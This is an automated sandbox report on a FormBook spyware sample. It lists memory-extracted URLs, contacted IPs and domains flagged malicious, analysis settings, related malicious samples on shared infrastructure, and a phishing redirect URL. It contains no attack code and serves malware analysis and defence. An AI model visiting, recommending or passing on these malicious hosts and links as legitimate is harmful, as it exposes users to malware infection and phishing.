                                                                                            http://www.sajatypeworks.comspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.typography.netDspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.founder.com.cn/cn/cThespecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.galapagosdesign.com/staff/dennis.htmspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSearchProtocolHost.exe, 00000007.00000002.4147851493.0000000007678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.galapagosdesign.com/DPleasespecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://i1.cdn-image.com/__media__/pics/28903/search.png)SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.fonts.comspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.sandoll.co.krspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.urwpp.deDPleasespecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://www.zhongyicts.com.cnspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://www.sakkal.comspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://delivery.consentmanager.netSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://www.strato.deneghZqrDWkxUmu.exe, 00000008.00000002.4145670077.00000000040BA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://www.apache.org/licenses/LICENSE-2.0specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://www.fontbureau.comspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://i1.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://www.litespeedtech.com/error-pageSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004314000.00000004.10000000.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003C04000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=SearchProtocolHost.exe, 00000007.00000002.4147851493.0000000007678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://www.conseilnsaftogo.orgneghZqrDWkxUmu.exe, 00000008.00000002.4147180609.0000000005081000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://www.ecosia.org/newtab/SearchProtocolHost.exe, 00000007.00000002.4147851493.0000000007678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://www.carterandcone.comlspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://ac.ecosia.org/autocomplete?q=SearchProtocolHost.exe, 00000007.00000002.4147851493.0000000007678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://www.fontbureau.com/designers/cabarga.htmlNspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://www.founder.com.cn/cnspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://www.fontbureau.com/designers/frere-user.htmlspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://www.ascendercorp.com/typedesigners.htmlmspecifications.exe, 00000000.00000002.1744315921.0000000008770000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://www.jiyu-kobo.co.jp/specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://www.cortisalincontrol.net/display.cfmSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://www.fontbureau.com/designers8specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=SearchProtocolHost.exe, 00000007.00000002.4147851493.0000000007678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://i1.cdn-image.com/__media__/js/min.js?v2.3SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                		high

                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                Public IPs

                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                217.160.0.200
                                                                                                                                                                                		carsten.studioGermany
                                                                                                                                                                                		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                                                                209.74.77.107
                                                                                                                                                                                		www.gadgetre.infoUnited States
                                                                                                                                                                                		31744MULTIBAND-NEWHOPEUStrue
                                                                                                                                                                                23.225.159.42
                                                                                                                                                                                		r0lqcud7.nbnnn.xyzUnited States
                                                                                                                                                                                		40065CNSERVERSUStrue
                                                                                                                                                                                154.70.82.246
                                                                                                                                                                                		conseilnsaftogo.orgTogo
                                                                                                                                                                                		30982CAFENETTGtrue
                                                                                                                                                                                156.232.181.155
                                                                                                                                                                                		www.5tuohbpzyj9.buzzSeychelles
                                                                                                                                                                                		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                                                                                                                                                103.75.185.22
                                                                                                                                                                                		taxitayninh365.siteViet Nam
                                                                                                                                                                                		63762VNBOOKING-AS-VNVietNamBookingcorporationVNtrue
                                                                                                                                                                                155.94.253.4
                                                                                                                                                                                		rtpmesinkoin.clickUnited States
                                                                                                                                                                                		8100ASN-QUADRANET-GLOBALUStrue
                                                                                                                                                                                208.91.197.27
                                                                                                                                                                                		www.cortisalincontrol.netVirgin Islands (BRITISH)
                                                                                                                                                                                		40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                                                                                185.27.134.206
                                                                                                                                                                                		www.canadavinreport.siteUnited Kingdom
                                                                                                                                                                                		34119WILDCARD-ASWildcardUKLimitedGBfalse
                                                                                                                                                                                104.21.90.137
                                                                                                                                                                                		www.ana-silverco.shopUnited States
                                                                                                                                                                                		13335CLOUDFLARENETUStrue
                                                                                                                                                                                176.32.38.130
                                                                                                                                                                                		www.acc888ommodate.xyzRussian Federation
                                                                                                                                                                                		51659ASBAXETRUtrue
                                                                                                                                                                                161.97.168.245
                                                                                                                                                                                		www.nb-shenshi.buzzUnited States
                                                                                                                                                                                		51167CONTABODEfalse

                                                                                                                                                                                General Information

                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                Analysis ID:1565081
                                                                                                                                                                                Start date and time:2024-11-29 09:14:09 +01:00
                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                Overall analysis duration:0h 10m 20s
                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                Report type:full
                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                Number of analysed new started processes analysed:9
                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                Number of injected processes analysed:2
                                                                                                                                                                                Technologies:
                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                Sample name:specifications.exe
                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@7/2@19/12
                                                                                                                                                                                EGA Information:
                                                                                                                                                                                • Successful, ratio: 80%
                                                                                                                                                                                HCA Information:
                                                                                                                                                                                • Successful, ratio: 95%
                                                                                                                                                                                • Number of executed functions: 119
                                                                                                                                                                                • Number of non-executed functions: 299
                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                                Warnings

                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                • Execution Graph export aborted for target neghZqrDWkxUmu.exe, PID 5572 because it is empty
                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                • VT rate limit hit for: specifications.exe

                                                                                                                                                                                Simulations

                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                03:15:03API Interceptor2x Sleep call for process: specifications.exe modified
                                                                                                                                                                                03:16:13API Interceptor9845711x Sleep call for process: SearchProtocolHost.exe modified

                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                IPs

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                217.160.0.200ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                • www.carsten.studio/fqxx/
                                                                                                                                                                                IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                • www.carsten.studio/lnel/
                                                                                                                                                                                5674656777985-069688574654 pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • www.carsten.studio/bdk6/
                                                                                                                                                                                PO-3170012466.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • www.dukesribbar.com/bbk4/?h0DhlHu=f2IIPTVxZMpXMJMuzfnk2NWDEb+JwK8g816o2ZnROlKngCQ4rxAc1D8js0OmEx/F+OtZ&tXi0=MXbP9
                                                                                                                                                                                209.74.77.107OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • www.learnwithus.site/alu5/
                                                                                                                                                                                ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                • www.gadgetre.info/8q8w/
                                                                                                                                                                                OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • www.learnwithus.site/alu5/
                                                                                                                                                                                Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • www.beyondfitness.live/fbpt/
                                                                                                                                                                                RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • www.learnwithus.site/alu5/
                                                                                                                                                                                23.225.159.42New Order - RCII900718_Contract Drafting.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • www.laohub10.net/dfeq/
                                                                                                                                                                                154.70.82.246ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                • www.conseilnsaftogo.org/lqxd/
                                                                                                                                                                                https://d.agkn.com/pixel/10751/?che=1680529529190&ip=146.70.117.118&l1=http://7pnnyuzt.jirehsolux.com?ZGFyeWxAaGVhbHRoZXN5c3RlbXMuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 7pnnyuzt.jirehsolux.com/?ZGFyeWxAaGVhbHRoZXN5c3RlbXMuY29t

                                                                                                                                                                                Domains

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                r0lqcud7.nbnnn.xyzOUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 202.79.161.151
                                                                                                                                                                                ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                • 202.79.161.151
                                                                                                                                                                                OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 27.124.4.246
                                                                                                                                                                                REQUESTING FOR UPDATED SOA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 23.225.160.132
                                                                                                                                                                                PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 23.225.160.132
                                                                                                                                                                                purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 27.124.4.246
                                                                                                                                                                                Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 202.79.161.151
                                                                                                                                                                                RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 27.124.4.246
                                                                                                                                                                                New Order - RCII900718_Contract Drafting.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 23.225.159.42
                                                                                                                                                                                www.acc888ommodate.xyzARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                • 176.32.38.130
                                                                                                                                                                                Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 176.32.38.130
                                                                                                                                                                                www.5tuohbpzyj9.buzzARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                • 156.232.181.155
                                                                                                                                                                                PO-DC13112024_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 156.232.181.155

                                                                                                                                                                                ASNs

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                MULTIBAND-NEWHOPEUSA2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 209.74.77.109
                                                                                                                                                                                OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 209.74.77.107
                                                                                                                                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 209.74.77.108
                                                                                                                                                                                ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                • 209.74.77.107
                                                                                                                                                                                Payment_Confirmation_pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                • 209.74.77.108
                                                                                                                                                                                OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 209.74.77.107
                                                                                                                                                                                W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                • 209.74.77.109
                                                                                                                                                                                FACTURA 24V70 VINS.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 209.74.64.190
                                                                                                                                                                                DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                • 209.74.77.109
                                                                                                                                                                                packing list G25469.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 209.74.64.59
                                                                                                                                                                                ONEANDONE-ASBrauerstrasse48DEloligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                • 74.208.23.56
                                                                                                                                                                                https://www.campus-teranga.com/public/redirect?url=https://lhbroker.com/bm/#XYWxleGFuZGVyLmtlZHppb3JAYXNodXJzdC5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                • 74.208.236.218
                                                                                                                                                                                ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                • 217.160.0.200
                                                                                                                                                                                attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                • 74.208.236.156
                                                                                                                                                                                splarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 104.192.5.161
                                                                                                                                                                                https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://digitalplatform-admin-p.azurewebsites.net/external-link/?targetURL=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25SERIAL%2525wDnNeW8yycT&sa=t&esrc=nNeW8F%25SERIAL%2525A0xys8Em2FL&source=&cd=tS6T8%25SERIAL%2525Tiw9XH&cad=XpPkDfJX%25SERIAL%2525VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/www.monument-funerar.ro/admin/view/image/payment/#test@example.deGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                • 217.160.0.248
                                                                                                                                                                                Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 217.160.0.113
                                                                                                                                                                                FACTURA 24V70 VINS.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 217.160.0.158
                                                                                                                                                                                IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                • 217.160.0.200
                                                                                                                                                                                7jBzTH9FXQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 82.165.72.122
                                                                                                                                                                                CNSERVERSUSPO# 81136575.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                                                                                                                                • 23.225.34.75
                                                                                                                                                                                Salmebogs(1).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                • 154.88.22.104
                                                                                                                                                                                nabm68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 162.209.130.216
                                                                                                                                                                                OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 154.88.22.101
                                                                                                                                                                                pjyhwsdgkl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 45.43.9.206
                                                                                                                                                                                OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 154.88.22.101
                                                                                                                                                                                arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                • 172.247.21.10
                                                                                                                                                                                piR516SetM.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                • 154.90.62.248
                                                                                                                                                                                XwUh11g4l4.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 154.90.62.248
                                                                                                                                                                                REQUESTING FOR UPDATED SOA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                • 23.225.160.132
                                                                                                                                                                                CAFENETTGARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                • 154.70.82.246
                                                                                                                                                                                sora.x86-20240504-0115.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                • 80.248.76.190
                                                                                                                                                                                Y98pGn3FUt.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                • 80.248.76.172
                                                                                                                                                                                WeKOvoISwM.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                • 80.248.76.176
                                                                                                                                                                                F9eqjesWZR.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                • 80.248.76.143
                                                                                                                                                                                arm7-20240101-1250.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                • 80.248.76.163
                                                                                                                                                                                o8bI79fBhK.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                • 80.248.76.173
                                                                                                                                                                                sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                • 80.248.76.140
                                                                                                                                                                                sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                • 80.248.76.199
                                                                                                                                                                                dPJTQiCFxS.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 80.248.76.161

                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                No context

                                                                                                                                                                                Dropped Files

                                                                                                                                                                                No context

                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\specifications.exe.log

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\Desktop\specifications.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1216
                                                                                                                                                                                Entropy (8bit):5.34331486778365
                                                                                                                                                                                Encrypted:false
